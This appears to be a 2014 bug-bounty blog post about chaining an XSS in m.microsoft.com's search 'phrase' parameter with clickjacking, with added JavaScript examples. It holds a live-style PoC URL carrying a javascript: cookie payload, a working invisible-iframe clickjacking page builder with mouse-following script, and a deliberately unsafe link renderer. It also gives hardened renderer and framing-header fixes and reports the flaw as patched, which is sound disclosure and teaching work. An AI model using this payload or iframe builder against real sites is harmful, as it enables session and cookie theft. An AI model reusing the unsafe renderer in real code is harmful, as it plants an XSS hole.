Microsoft: Exploiting XSS with clickjacking

2014-09-01T17:52:00
ID WEBSECURITYLOG:9F84DEAB4F8DD79AECD66698E9333990
Type websecuritylog
Reporter jeet jaiswal (noreply@blogger.com)
Modified 2014-09-01T17:55:20

Description

Little Insight:

Clickjacking is essentially hide-the-button-and-follow-the-mouse. It is also known as UI redressing: the attacker plays with the user interface of the victim application, using clicks and mouse events, so that the user acts on a page they cannot see. In this post we show a UI-redressing attack and how an attacker can use it to trigger an XSS flaw that is otherwise not exploitable on its own.

How Does This Work?

UI redressing relies on a few techniques to make the attack succeed:

  1. using mouse clicks
  2. making an invisible iframe and following the mouse
  3. showing only a certain small part of a web page in a frame
  4. dragging text out of an application
  5. dragging text into an application
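The two techniques this post actually uses, the invisible iframe and follow-the-mouse, as an added example that is not code from the original post. It builds the attacker page as a string: a visible decoy button, and above it a fully transparent iframe positioned so the framed link sits under the button (or under the cursor). The target URL and the link/decoy rectangles are assumed values for illustration.

```javascript
// Added example, not code from the original post: build a UI-redressing
// page that frames a target URL invisibly and either pins the framed link
// under a decoy button or makes it follow the mouse.
// The target URL and the link/decoy rectangles below are assumed values.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Offset for the iframe so that the link at linkRect (coordinates inside the
// framed page) is centred under the decoy at decoyRect (coordinates on the
// attacker page). Both rects: { left, top, width, height } in CSS pixels.
function computeFrameOffset(linkRect, decoyRect) {
  const linkCx = linkRect.left + linkRect.width / 2;
  const linkCy = linkRect.top + linkRect.height / 2;
  const decoyCx = decoyRect.left + decoyRect.width / 2;
  const decoyCy = decoyRect.top + decoyRect.height / 2;
  return { left: Math.round(decoyCx - linkCx), top: Math.round(decoyCy - linkCy) };
}

// Attacker page: a visible decoy button (z-index 1) and, above it, a fully
// transparent iframe (opacity 0, z-index 2) showing the target. Clicks reach
// the iframe, i.e. the framed link, not the button the victim sees.
function buildClickjackPage({ targetUrl, linkRect, decoyRect, decoyText, followMouse = false }) {
  const { left, top } = computeFrameOffset(linkRect, decoyRect);
  const frameStyle = `position:absolute;left:${left}px;top:${top}px;width:1200px;height:800px;opacity:0;z-index:2;border:0`;
  const decoyStyle = `position:absolute;left:${decoyRect.left}px;top:${decoyRect.top}px;width:${decoyRect.width}px;height:${decoyRect.height}px;z-index:1`;
  // Follow-the-mouse variant: re-position the frame on every mousemove so
  // the framed link's centre stays under the cursor wherever the victim clicks.
  const linkCx = linkRect.left + linkRect.width / 2;
  const linkCy = linkRect.top + linkRect.height / 2;
  const followScript = followMouse
    ? `<script>
document.addEventListener('mousemove', function (e) {
  var f = document.getElementById('cj');
  f.style.left = (e.pageX - ${linkCx}) + 'px';
  f.style.top = (e.pageY - ${linkCy}) + 'px';
});
</script>`
    : '';
  return `<!doctype html>
<html><body>
<button style="${decoyStyle}">${escapeHtml(decoyText)}</button>
<iframe id="cj" src="${escapeHtml(targetUrl)}" style="${frameStyle}"></iframe>
${followScript}
</body></html>`;
}

// Constructed sample: a target whose "click here" link is at (100,200), 50x20,
// inside the framed page, and a decoy button at (400,300), 120x40.
const samplePage = buildClickjackPage({
  targetUrl: 'https://target.example/search?q=x&y=z', // assumed target, not the post's URL
  linkRect: { left: 100, top: 200, width: 50, height: 20 },
  decoyRect: { left: 400, top: 300, width: 120, height: 40 },
  decoyText: 'Click to continue',
  followMouse: true,
});
```

The page only works when the target sends neither an X-Frame-Options header nor a Content-Security-Policy frame-ancestors directive that excludes the attacker's origin; that missing header is exactly the condition the finding in this post depends on.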

My Finding....

Domain: http://m.microsoft.com

Vulnerable parameter: phrase

PoC URL:

http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url]

The phrase parameter decodes to the BBCode-style markup [url=javascript:alert(document.cookie)]click here and see your result[/url].

After opening this URL, the results page stores the XSS payload as a hyperlink whose text is "click here and see your result" and whose href is the javascript: URL.

When the user clicks that hyperlink, the XSS runs.
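Why the payload becomes a live link: a minimal renderer for the [url=...]...[/url] markup the PoC targets, written as an added example (this is not the site's code; it is the behaviour the PoC implies). The vulnerable version trusts the url attribute, so a javascript: scheme becomes a clickable script; the hardened version allows only http(s) and escapes everything. The inputs are constructed.

```javascript
// Added example, not the site's code: a minimal renderer for the
// [url=...]...[/url] markup the PoC payload targets, first in the
// vulnerable form the post implies (the href is trusted), then hardened.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

const URL_TAG = /\[url=([^\]]+)\]([\s\S]*?)\[\/url\]/gi;

// Vulnerable: whatever is in url=... becomes the href, so
// [url=javascript:alert(document.cookie)] yields a live javascript: link.
function renderUrlTagsUnsafe(text) {
  return text.replace(URL_TAG, (m, href, label) => `<a href="${href}">${label}</a>`);
}

// Only http(s) URLs may become links. new URL() normalises the scheme
// (so "JaVaScRiPt:" and leading whitespace are caught) and throws on
// relative or malformed input, which we also refuse.
function safeHref(raw) {
  let u;
  try { u = new URL(raw.trim()); } catch { return null; }
  return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : null;
}

// Hardened: escape all surrounding text, escape the label and href, and
// drop the link entirely (keep the label as plain text) for unsafe schemes.
function renderUrlTagsSafe(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(URL_TAG)) {
    out += escapeHtml(text.slice(last, m.index));
    const href = safeHref(m[1]);
    const label = escapeHtml(m[2]);
    out += href ? `<a href="${escapeHtml(href)}" rel="noopener">${label}</a>` : label;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Constructed inputs: the post's payload (decoded) and a benign link.
const PAYLOAD = '[url=javascript:alert(document.cookie)]click here and see your result[/url]';
const BENIGN = 'see [url=https://example.com/?a=1&b=2]docs[/url] <now>';
```

Scheme allow-listing, not a deny-list of "javascript:", is the point: deny-lists miss case variants, leading whitespace and other script-capable schemes, whereas the URL parser normalises all of those before the comparison.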

That makes it a self-XSS: it needs the user to click. But I found that the domain did not set any X-Frame-Options header, which gave me the idea of exploiting the XSS with clickjacking.

I set up an iframe with the PoC URL on my website, with a button on top of it. When a user comes to my site and clicks the button, I can steal the user's Microsoft account cookie along with the session.
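The check that turned this self-XSS into a real attack is whether the vulnerable page can be framed at all. As an added example (not from the original post), the function below decides that from a response's X-Frame-Options and Content-Security-Policy frame-ancestors headers, and shows the weak case the post describes (no header) beside a fixed response. The header sets are constructed.

```javascript
// Added example, not from the original post: decide whether a response can
// be framed from a given origin, using its X-Frame-Options and
// Content-Security-Policy frame-ancestors headers, and show the weak
// (missing) headers beside fixed ones. Header sets are constructed.

// Returns the frame-ancestors source list, or null if the directive is absent.
function parseFrameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map(t => t.toLowerCase());
    }
  }
  return null;
}

// Match one CSP source expression against the framing origin. Simplification:
// a host-source without an explicit scheme matches any scheme here.
function matchesSource(src, framerOrigin, pageOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return framerOrigin === pageOrigin;
  if (src === '*') return true;
  let framer;
  try { framer = new URL(framerOrigin); } catch { return false; }
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return framer.protocol === src; // scheme-source, e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && framer.protocol !== scheme + ':') return false;
  const framerPort = framer.port || (framer.protocol === 'https:' ? '443' : '80');
  if (port && port !== '*' && port !== framerPort) return false;
  return wildcard ? framer.hostname.endsWith('.' + host) : framer.hostname === host;
}

// true when a page served with `headers` (name -> value) from pageOrigin
// can be put in an iframe by a page at framerOrigin.
function canBeFramedBy(headers, framerOrigin, pageOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  // When frame-ancestors is present, browsers ignore X-Frame-Options.
  const ancestors = h['content-security-policy']
    ? parseFrameAncestors(h['content-security-policy'])
    : null;
  if (ancestors) return ancestors.some(src => matchesSource(src, framerOrigin, pageOrigin));
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  // Header missing, or an unrecognised/obsolete value such as ALLOW-FROM:
  // treated here as no protection.
  return true;
}

// Constructed response headers: the weak case the post describes (no
// X-Frame-Options at all) and a fixed response carrying both mechanisms.
const WEAK_HEADERS = { 'Content-Type': 'text/html; charset=utf-8' };
const FIXED_HEADERS = {
  'Content-Type': 'text/html; charset=utf-8',
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
};
```

Sending both headers is the usual fix: frame-ancestors is the modern control and supports allow-lists, while X-Frame-Options covers older browsers. Either one alone would already have stopped the attack in this post, since the attacker page is on a different origin.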

See what is behind the clickable button:

When the user clicks the button, the XSS is exploited via clickjacking.

More Information

The vulnerability described here has been confirmed as patched by the Microsoft Security Team.